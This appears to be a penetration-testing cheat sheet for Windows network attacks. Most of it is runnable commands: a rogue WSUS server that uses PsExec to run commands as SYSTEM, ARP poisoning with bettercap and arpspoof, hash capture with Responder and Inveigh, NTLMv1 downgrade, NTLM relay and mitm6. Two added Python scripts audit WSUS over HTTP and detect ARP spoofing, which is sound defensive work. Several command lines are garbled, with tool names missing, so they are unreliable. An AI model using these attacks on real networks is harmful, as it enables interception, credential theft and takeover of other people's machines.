WSUS HTTP misconfiguration

  1. Ability to obtain a MiTM position against the vulnerable host
  2. Communication between the victim and the WSUS server is over HTTP

With user-level access on the victim machine, this allows escalation to SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to the victim machine, you can attempt to set up a system proxy manually (attacker IP and port 8530). The proxy redirection of port 8530 will still be needed.

Other machines can be targeted the same way, but you depend on how often each client checks for updates.

Check the registry on the WSUS client machine

The protocol in the WUServer value must be HTTP for the attack to apply. Example of a vulnerable URL: http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer actually uses the WSUS server for updates, and review the automatic update policy.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy > Windows Components > Windows Update > Specify intranet Microsoft update service location.
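As an added example (not part of the original cheat sheet or of any tool it names), a small Python audit script that parses the output of the two REG QUERY commands above and decides whether the client is actually exposed. It only reports "vulnerable" when UseWUServer is 1 and the WUServer URL is plain HTTP; an HTTPS URL or a client that does not use WSUS is reported as not exploitable. It also summarises the AUOptions policy. The embedded REG QUERY output is constructed, and the server name in it is a placeholder.

```python
import re
import sys
from urllib.parse import urlsplit

# Constructed sample of what the two REG QUERY commands print
# (not captured from a real host; the server name is a placeholder).
SAMPLE_WU = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus-server.local:8530
    WUStatusServer    REG_SZ    http://wsus-server.local:8530
"""

SAMPLE_AU = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
    NoAutoUpdate    REG_DWORD    0x0
    AUOptions    REG_DWORD    0x4
    UseWUServer    REG_DWORD    0x1
"""

# "    Name    REG_TYPE    data" lines; the unindented key path line is skipped.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")

# Meaning of the AUOptions policy value of the Windows Update client.
AU_OPTIONS = {
    2: "notify before download",
    3: "auto download, notify before install",
    4: "auto download and schedule install",
    5: "local admin chooses",
}


def parse_reg_query(text):
    """Turn REG QUERY output into {value_name: data}; REG_DWORD data becomes int."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue
        name, rtype, data = m.group(1), m.group(2), m.group(3).strip()
        if rtype == "REG_DWORD":
            data = int(data, 0)  # REG QUERY prints DWORDs as 0x... hex
        values[name] = data
    return values


def assess_wsus(wu_values, au_values):
    """Return (status, detail).

    'vulnerable' only when the client really is pointed at a WSUS server
    (UseWUServer = 1 and a WUServer URL) and that URL is plain HTTP.
    A client with UseWUServer = 0 talks to Microsoft Update directly, so a
    leftover HTTP WUServer value is not exploitable by itself."""
    if au_values.get("UseWUServer", 0) != 1 or "WUServer" not in wu_values:
        return "not_applicable", "client does not use a WSUS server"
    url = wu_values["WUServer"]
    scheme = urlsplit(url).scheme.lower()
    if scheme == "http":
        return "vulnerable", f"WUServer is plain HTTP: {url}"
    if scheme == "https":
        return "ok", f"WUServer uses HTTPS: {url}"
    return "unknown", f"unexpected WUServer value: {url}"


def describe_policy(au_values):
    """Human-readable summary of the AU key, for the report."""
    if au_values.get("NoAutoUpdate", 0) == 1:
        return "automatic updates disabled"
    return AU_OPTIONS.get(au_values.get("AUOptions"), "AUOptions not set")


def read_text(path):
    """Read a saved REG QUERY output; PowerShell redirection writes UTF-16LE."""
    raw = open(path, "rb").read()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Pass the two saved REG QUERY outputs as files, or run on the sample.
    if len(sys.argv) == 3:
        wu_text, au_text = read_text(sys.argv[1]), read_text(sys.argv[2])
    else:
        wu_text, au_text = SAMPLE_WU, SAMPLE_AU
    wu, au = parse_reg_query(wu_text), parse_reg_query(au_text)
    status, detail = assess_wsus(wu, au)
    print(f"{status}: {detail} (policy: {describe_policy(au)})")
```

Save the two REG QUERY outputs to files on the client (for example `REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate" > wu.txt`) and pass them as the two arguments; with no arguments the script runs on the embedded sample. Switching WUServer to an HTTPS URL, which the script reports as "ok", is the fix for this finding.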

Tooling install

Install from

Activate the venv if one was used during setup.

source ./venv/bin/activate
Start WSUS rogue server

Ensure PsExec64.exe is in the pywsus current directory (Windows Update will only run Microsoft-signed binaries).

python3 -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '
MiTM position

Content of wsus.cap:

arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning.

sudo bettercap -i <IFACE> --caplet wsus.cap


Set the challenge to 1122334455667788 in /etc/responder/Responder.conf.

The -f option may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3


NTLM MITM attacks


Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y

Packets can be captured so that the hashes can be extracted from the trace afterwards:

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack

NTLM Relay

SMB signing has to be disabled on the target for this kind of attack. Windows 10 machines prefer IPv6 over IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w -tf smbrelay.txt

Add computer start BH (not tested) -t ldaps://<dc_fqdn> --add-computer
python -d <domain> -u <computer>\$ -p '<password>'

Priv exchange (not tested) -t ldap://<dc_fqdn> --escalate-user <user>

python -ah <fqdn> <dc_fqdn> -u <user> -d <domain>


mitm6 -d <fqdn> -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

Relay and delegation

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -s 65535 -w out.pcap -vv   # -s sets the snaplen; -S prints absolute TCP sequence numbers and takes no argument

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -s 65535 -w out.pcap -vv   # -s sets the snaplen; -S prints absolute TCP sequence numbers and takes no argument
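The detection counterpart of the bettercap arp.spoof caplet under "MiTM position" and of the arpspoof commands in this section, as an added example that is not part of the original cheat sheet or of either tool: a Python script that reads ARP replies in the text form `tcpdump -n arp` prints (the same traffic that ends up in the out.pcap written above, readable with `tcpdump -n -r out.pcap arp`) and flags the two symptoms of ARP poisoning, one IP answered by several MACs and one MAC answering for several IPs, plus any reply that contradicts a trusted IP-to-MAC table. The sample lines and all addresses are constructed.

```python
import re
import sys
from collections import defaultdict

# Constructed tcpdump-style ARP lines (the shape `tcpdump -n arp` prints);
# addresses are made up. The legitimate gateway (192.168.1.1) answers first,
# then a second host starts claiming both the gateway's and a client's IP.
SAMPLE_ARP = """\
10:00:00.000100 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:00.000200 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
10:00:05.000300 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
10:00:05.000400 ARP, Reply 192.168.1.20 is-at de:ad:be:ef:00:01, length 28
10:00:06.000500 ARP, Reply 192.168.1.30 is-at 66:77:88:99:aa:bb, length 28
"""

REPLY = re.compile(
    r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I
)


def parse_arp_replies(text):
    """Yield (ip, mac) for every ARP reply line; requests carry no binding."""
    for line in text.splitlines():
        m = REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoofing(text, known=None):
    """Return a list of findings from the ARP replies in `text`.

    ip_conflict      one IP answered by more than one MAC (the gateway's
                     MAC "changing" is the classic arpspoof symptom)
    mac_claims_many  one MAC answering for several IPs (what the poisoning
                     host does when it impersonates both ends)
    mismatch_known   a reply that contradicts a trusted ip->mac table
                     (e.g. the gateway's real MAC), when one is supplied
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    findings = []
    for ip, mac in parse_arp_replies(text):
        if known and ip in known and known[ip].lower() != mac:
            findings.append(("mismatch_known", ip, mac))
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    for ip, macs in sorted(ip_to_macs.items()):
        if len(macs) > 1:
            findings.append(("ip_conflict", ip, sorted(macs)))
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            findings.append(("mac_claims_many", mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    # Pipe a capture in (`tcpdump -n -l arp | python3 arpwatch_lite.py`, a
    # hypothetical file name) or, with no piped input, run on the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ARP
    for kind, subject, detail in detect_arp_spoofing(text):
        print(f"{kind}: {subject} -> {detail}")
```

Treat mac_claims_many as a weak signal on its own: routers, virtualisation hosts and machines with several addresses legitimately answer for more than one IP. The strong signal is ip_conflict on the gateway address, or a mismatch against a known table of the gateway and other fixed hosts, which is also what a static ARP entry for the gateway on sensitive hosts protects against.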